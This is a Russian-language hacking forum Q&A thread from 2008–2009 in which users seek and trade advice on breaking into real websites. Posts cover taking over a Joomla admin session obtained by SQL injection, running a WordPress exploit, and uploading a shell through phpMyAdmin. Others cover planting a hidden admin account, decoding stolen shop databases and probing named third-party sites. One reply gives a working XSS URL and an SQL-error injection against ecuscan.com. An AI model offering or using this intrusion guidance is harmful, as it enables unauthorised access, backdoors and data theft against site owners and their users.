PDA

Просмотр полной версии : [Задай Вопрос - Получи Ответ]


Rombl4
17.11.2008, 09:10
Внимание! Данная тема предназначена для Ваших вопросов. Создавать темы, посвященные какому - либо вопросу - не нужно, все спрашиваем тут, в переделах тематики раздела. Созданные темы, содержащие вопрос будут удаляться, как оффтоп// ZAMUT

Привет всем!

Подскажите как влезть в админку Джумлы имея на руках id админской сессии, добытый через Sql-inj? Брут хеша пароля (вытащенный также из БД) не удается.

cybersly
18.11.2008, 01:03
никак
return md5( $conf->getValue('config.secret') . $seed );
нужно занать secret из configuration.php

hackmen
29.11.2008, 02:05
Экспоит под WP 2\0\5 -ссылка (http://milw0rm.com/exploits/3095)
ПРи запуске выбивает ошибку.


http://img266.imageshack.us/img266/1851/43813173eg6.gif (http://imageshack.us)

Что и где я делаю неправильно?

С меня ++ =)

fly
30.11.2008, 00:29
А ты его что через перл может запускаешь)?

hackmen
01.12.2008, 01:03
А ты его что через перл может запускаешь)?

C чего ты взял?

anti-killer
03.12.2008, 18:13
Вопроски такой...как узнать версию движка? На пример WordPress.

Karantin
03.12.2008, 18:21
Вопроски такой...как узнать версию движка? На пример WordPress.
Вордпресс можешь в исходник страницы посмотреть <meta name="generator" content="WordPress 2.6.3" />

anti-killer
03.12.2008, 18:35
Во сновном все это дело сносят.... я надеился на какой нибуть сканер версии движка.

Qwazar
03.12.2008, 18:45
Вопроски такой...как узнать версию движка? На пример WordPress. Индивидуально, для wordpress:
https://forum.antichat.ru/threadnav50572-6-10.html#post655973
или
https://forum.antichat.ru/threadnav50572-6-10.html#post673056

ilyha
04.12.2008, 14:02
Подскажите плииз, как блог ломанули этот _ttp://www.angelashelton.com/weblog/ .Ссылки подгружены 90% взлом был через двиг блога. Версия 2.0.1 . Потерзайте плииз, кому не сложно!

R1dex
04.12.2008, 14:10
http://www.angelashelton.com/cgi-bin/pd/admin/

ilyha
04.12.2008, 21:39
Ооо, это уже кое что, а все таки чеерез двиг вордпресса, есть вариант?...

NewBHack
20.12.2008, 23:06
ecuscan.com
Вот посмотрите плиз. Используется бд Jet Database +
Asp.

SVAROG
20.12.2008, 23:29
подозреваю что двиг самописный

Pashkela
20.12.2008, 23:50
Самосписный, несамописный, на вот, xss:


http://ecuscan.com/Support3.asp?categoryid=94&sortsid=1&supporttype=1&category=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C %2Fscript%3E%3C%22&sorts=BMW


Ошибки всяческие:


http://ecuscan.com/Support3.asp?categoryid='&sortsid=1&supporttype=1&category=ECU&sorts=BMW

NewBHack
21.12.2008, 16:30
ребят там дырок больше чем в сите, в том числе и sql-inj... дак вот я её собственно раскручивал, думал скачать такой же движок - посмотреть как она базу данных создает... нашел таблицу admin, email и прочее, а вот собственно название столбцов не могу...
Пробовал брутить - ничего :( :( ...
Поэтому и решил вас спросить мож подсказали бы что за двиг... Гуглил по кускам кода из содержания страницы, названиям гифок... нифига :(

ZEXEL
31.12.2008, 15:54
1.) Подскажите какие CMS на таких сайтах :
http://webkiosk.com.ua/
http://www.popolni.net/
или это замописы ? или можете предоставить какие то cms на которые можна пополнения щетов зделать и т.д !
2.) Подскажите какойто двиг который бы подошол для размещения обьявлений на подобии продажи автомобилей !

Dream.fdr
07.01.2009, 01:36
Все никак недойду мозгой... насчет XSS. Пассивная - я понял - готовую ссылку впариваешь юзеру (он должен перейти по ней) - получаешь его куки. А активная?? Да, я понял - человек заходит просто на страницу или смотрит сообщение - куки твои, но мне что, прийдется менять файлы на бажном сервере?? но тогда ведь нужно иметь доступ к этим файлам, права и т.д.... или что? честно говоря я так и не уяснил этого ни в одном руководстве...((( объясните популярней танкисту.

Dream.fdr
07.01.2009, 01:53
Спасибо! Вот теперь понял! :)

Т.е. чтоб использовать акт. xss - нужно внести этот код на страницу путем размещения поста, подписи своей... понял!.. т.е. главное в этом - найти способ обхода фильтрации символов?

miptkvant
08.01.2009, 20:29
сайт ругнулся
General Error
SQL ERROR [ mysql4 ]

Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (111) [2002]

An sql error occurred while fetching this page. Please contact an administrator if this problem persists.

что из этого я могу извлечь? насколько я понял версия mysql 4 а вот про бд непонял mysql.sock' (111) [2002]
что эт значит?

roleg
12.01.2009, 20:36
на запрос /stat_init_groovy?serviceIdentity=5 иногда можно получить вылет:

1. DB Error: no database selected
Code: 2013
Description: Lost connection to MySQL server during query
SQL: SELECT ss.id, ss.parent_id, ss.alias, ss.path, ss.c_img, ssd.name FROM sites_structure ss, sites_structure_desc ssd, sites_structure_access ssa WHERE ss.site_id='1' AND ssd.section_id=ss.id AND ssd.lang_id='1' AND ssa.section_id=ss.id AND ss.alias = 'group_wide' AND ssa.user_group_id IN (0, 1)

раскрыт SQL запрос, как его можно поюзать в плане подстановок?

куки:
b: b
PHPSESSID: ****************
services: 1
ua/group_mail/portal b: b
ua/group_wide/dsl_init b: b
ua/home_home_groovy b: b

roleg
12.01.2009, 20:42
group_wide я так понял указано с кукисов.. но придумать ему разумную подстановку не могу :(

DeepBlue7
12.01.2009, 20:52
Вообщем столкнулся с одним хитрым серваком )) Вообщем есть доступ в phpmyadmin.. но remote url include отрублен.... как залить шелл можно ?? Заливаю сбственно через phpmyadmin.

kapadult
16.01.2009, 18:25
Значит, вот скрипт который я хочу вставить <TABLE BACKGROUND="java script:alert('Я здесь был')"> Table background я использую для обхода фильтрации в блоге. При редактировании сообщения (предварительный просмотр) скрипт работает без проблем. Но в обычном режиме, когда сообщение уже размещено в блоге, этот (да и не только этот) скрипт перестает работать! В чём проблема???

kapadult
16.01.2009, 18:28
Не могу понять что за хрень... По-моему вообще весь скрипт вырезается! А главное, если редактируешь это сообщение, то там всё на месте... Короче вот, сами попробуйте:

Регистрация: http://pdj.ru/register/
Блог: http://pdj.ru/cp/blog/add/

P.S. Чтобы писать в блоге нужно обязательно зарегиться и подтвердить e-mail!

bsod777
18.01.2009, 19:49
TypeError in Search#index
Showing app/views/basic_posts/_item.html.erb where line #3 raised:

can't modify frozen hash

Extracted source (around line #3):

1: <li class="item">
2: <%= render :partial => 'posts/meta', :locals => {:item => item, :top => local_assigns[:top]} %>
3: <h3><%= link_to_post item.title, item %></h3>
4: <div class="body formatted">
5: <% if @search %>
6: <%= item.parsed_body(current_user) %>


Trace of template inclusion: app/views/tops/_item.html.erb, app/views/search/index.html.erb

RAILS_ROOT: /home/xxx/releases/20090117051218

Application Trace | Framework Trace | Full Trace
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `[]='
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `write_attribute_without_dirty'
vendor/rails/activerecord/lib/active_record/dirty.rb:139:in `write_attribute'
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:211:in `slug_cache='
lib/extensions/slug_cache.rb:16:in `update_slug_cache'
lib/extensions/slug_cache.rb:21:in `update_slug_cache!'
lib/extensions/slug_cache.rb:8:in `to_param'
(eval):16:in `blog_note_path'
app/controllers/application.rb:99:in `send'
app/controllers/application.rb:99:in `url_to_post'
(eval):2:in `send'
(eval):2:in `url_to_post'
app/helpers/application_helper.rb:80:in `link_to_post'
app/views/basic_posts/_item.html.erb:3
app/views/tops/_item.html.erb:1
app/views/search/index.html.erb:7
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `[]='
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `write_attribute_without_dirty'
vendor/rails/activerecord/lib/active_record/dirty.rb:139:in `write_attribute'
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:211:in `slug_cache='
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:145):8:in `generate_raw'
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:154):2:in `generate'
vendor/rails/actionpack/lib/action_controller/routing/route_set.rb:343:in `generate'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:208:in `rewrite_path'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:187:in `rewrite_url'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:165:in `rewrite'
vendor/rails/actionpack/lib/action_controller/base.rb:626:in `url_for'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:152:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:184:in `render_partial_collection'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `map'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `send'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `method_missing'
vendor/rails/actionpack/lib/action_view/partials.rb:179:in `render_partial_collection'
vendor/rails/actionpack/lib/action_view/partials.rb:150:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/base.rb:256:in `render'
vendor/rails/actionpack/lib/action_view/base.rb:367:in `_render_with_layout'
vendor/rails/actionpack/lib/action_view/base.rb:254:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1177:in `render_for_file'
vendor/rails/actionpack/lib/action_controller/base.rb:896:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:868:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1251:in `default_render'
vendor/rails/actionpack/lib/action_controller/base.rb:1257:in `perform_action_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:617:in `call_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:610:in `perform_action_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
/usr/lib/ruby/1.8/benchmark.rb:293:in `measure'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
vendor/rails/actionpack/lib/action_controller/rescue.rb:136:in `perform_action_without_caching'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:13:in `perform_action_without_newrelic_trace'
vendor/rails/activerecord/lib/active_record/connection_adapters/abstract/query_cache.rb:34:in `cache'
vendor/rails/activerecord/lib/active_record/query_cache.rb:8:in `cache'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:12:in `perform_action_without_newrelic_trace'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:58:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:47:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:18:in `trace_method_execution_no_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:41:in `passenger_orig_perform_action'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:53:in `perform_action'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `send'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `process_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:606:in `process_without_session_management_support'
vendor/rails/actionpack/lib/action_controller/session_management.rb:134:in `process'
vendor/rails/actionpack/lib/action_controller/base.rb:392:in `process'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:184:in `handle_request'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:112:in `dispatch_unlocked'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:125:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `synchronize'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:134:in `dispatch_cgi'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:41:in `dispatch_without_newrelic'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/dispatcher_instrumentation.rb:47:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:38:in `process_request'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_request_handler.rb:165:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:321:in `start_request_handler'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:282:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:280:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:279:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:135:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:179:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:222:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `synchronize'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:126:in `spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:251:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/bin/passenger-spawn-server:46
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `[]='
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:313:in `write_attribute_without_dirty'
vendor/rails/activerecord/lib/active_record/dirty.rb:139:in `write_attribute'
vendor/rails/activerecord/lib/active_record/attribute_methods.rb:211:in `slug_cache='
lib/extensions/slug_cache.rb:16:in `update_slug_cache'
lib/extensions/slug_cache.rb:21:in `update_slug_cache!'
lib/extensions/slug_cache.rb:8:in `to_param'
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:145):8:in `generate_raw'
generated code (/home/xxx/releases/20090117051218/vendor/rails/actionpack/lib/action_controller/routing/route.rb:154):2:in `generate'
vendor/rails/actionpack/lib/action_controller/routing/route_set.rb:343:in `generate'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:208:in `rewrite_path'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:187:in `rewrite_url'
vendor/rails/actionpack/lib/action_controller/url_rewriter.rb:165:in `rewrite'
vendor/rails/actionpack/lib/action_controller/base.rb:626:in `url_for'
(eval):16:in `blog_note_path'
app/controllers/application.rb:99:in `send'
app/controllers/application.rb:99:in `url_to_post'
(eval):2:in `send'
(eval):2:in `url_to_post'
app/helpers/application_helper.rb:80:in `link_to_post'
app/views/basic_posts/_item.html.erb:3
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:152:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
app/views/tops/_item.html.erb:1
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:20:in `render'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:30:in `benchmark'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:19:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/renderable_partial.rb:45:in `render_partial'
vendor/rails/actionpack/lib/action_view/partials.rb:184:in `render_partial_collection'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `map'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `send'
vendor/plugins/ultrasphinx/lib/ultrasphinx/search.rb:433:in `method_missing'
vendor/rails/actionpack/lib/action_view/partials.rb:179:in `render_partial_collection'
vendor/rails/actionpack/lib/action_view/partials.rb:150:in `render_partial'
vendor/rails/actionpack/lib/action_view/base.rb:258:in `render'
app/views/search/index.html.erb:7
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `send'
vendor/rails/actionpack/lib/action_view/renderable.rb:39:in `render'
vendor/rails/actionpack/lib/action_view/template.rb:73:in `render_template'
vendor/rails/actionpack/lib/action_view/base.rb:256:in `render'
vendor/rails/actionpack/lib/action_view/base.rb:367:in `_render_with_layout'
vendor/rails/actionpack/lib/action_view/base.rb:254:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1177:in `render_for_file'
vendor/rails/actionpack/lib/action_controller/base.rb:896:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:868:in `render_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/rails/activesupport/lib/active_support/core_ext/benchmark.rb:8:in `realtime'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:51:in `render_without_trace_View____determine_metric_pat h__Rendering'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:138:in `render'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:137:in `render'
vendor/rails/actionpack/lib/action_controller/base.rb:1251:in `default_render'
vendor/rails/actionpack/lib/action_controller/base.rb:1257:in `perform_action_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:617:in `call_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:610:in `perform_action_without_benchmark'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
/usr/lib/ruby/1.8/benchmark.rb:293:in `measure'
vendor/rails/actionpack/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
vendor/rails/actionpack/lib/action_controller/rescue.rb:136:in `perform_action_without_caching'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:13:in `perform_action_without_newrelic_trace'
vendor/rails/activerecord/lib/active_record/connection_adapters/abstract/query_cache.rb:34:in `cache'
vendor/rails/activerecord/lib/active_record/query_cache.rb:8:in `cache'
vendor/rails/actionpack/lib/action_controller/caching/sql_cache.rb:12:in `perform_action_without_newrelic_trace'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:58:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:41:in `trace_method_execution_with_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:47:in `passenger_orig_perform_action'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/method_tracer.rb:18:in `trace_method_execution_no_scope'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/rails/action_controller.rb:41:in `passenger_orig_perform_action'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:53:in `perform_action'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `send'
vendor/rails/actionpack/lib/action_controller/base.rb:524:in `process_without_filters'
vendor/rails/actionpack/lib/action_controller/filters.rb:606:in `process_without_session_management_support'
vendor/rails/actionpack/lib/action_controller/session_management.rb:134:in `process'
vendor/rails/actionpack/lib/action_controller/base.rb:392:in `process'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:184:in `handle_request'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:112:in `dispatch_unlocked'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:125:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `synchronize'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:124:in `dispatch'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:134:in `dispatch_cgi'
vendor/rails/actionpack/lib/action_controller/dispatcher.rb:41:in `dispatch_without_newrelic'
vendor/plugins/newrelic_rpm/lib/new_relic/agent/instrumentation/dispatcher_instrumentation.rb:47:in `dispatch'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/request_handler.rb:38:in `process_request'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_request_handler.rb:165:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:321:in `start_request_handler'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:282:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:280:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:163:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/utils.rb:161:in `safe_fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:279:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:135:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `fork'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:112:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/railz/application_spawner.rb:179:in `start'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:222:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `synchronize'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:217:in `spawn_rails_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:126:in `spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/spawn_manager.rb:251:in `handle_spawn_application'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `__send__'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:317:in `main_loop'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/lib/passenger/abstract_server.rb:168:in `start_synchronously'
/usr/lib/ruby/gems/1.8/gems/passenger-2.0.6/bin/passenger-spawn-server:46
Request
Parameters:

{"q"=>"xxx"}

Show session dump

---
:user_id: xxx
:return_to: /xxx/xxx/xxx/x
flash: !map:ActionController::Flash::FlashHash {}


Response
Headers:

{"X-Powered-By"=>"Phusion Passenger (mod_rails/mod_rack) 2.0.6",
"Content-Type"=>"text/html",
"cookie"=>[],
"Cache-Control"=>"no-cache"}

Можно ли что-то с этим сделать?
и кста, как прятать в спойлеры?

Octave_Parango
23.01.2009, 10:53
Всем привет!

Подскажите если кто знает, дело такое.
Слил пару баз с нескольких ресурсов, крутились на OsCommerce,
там же прикручен модуль E-Commerce Engine (кто знает, тот знает).
В базе некоторые данные имеют не читабельный вид
пример:
(b?NЇi3e _©µгbђоЂ1)

От сюда вопрос:
Хранятся ли алго. в скриптах?
Если да, то какие нужно слить?

Спасибо!

p.s. Если не туда запостил - сорри!

as3kpwnz
26.01.2009, 14:48
^ Может кодировка албанская ? =)

Platon
27.01.2009, 23:22
Подскажите можно-ли в joomla (1.5.4 ) имея полный доступ к FTP и к joomle создать там скрытую учетную запись - с правами администратора - но чтобы она в админ панели не светилась. И с помощью нее управлять cms.
Спасибо!

Demiurge
29.01.2009, 14:40
Возник вопрос, пробую спойлом получить доступ, но к сожалению не выходит. Может ли кто-то подсказать ,каким образом, или спойлом можно вскрыть админа? А еще лучше доступ на сервер..

http://graphcodegroup.com/ttt.jpg


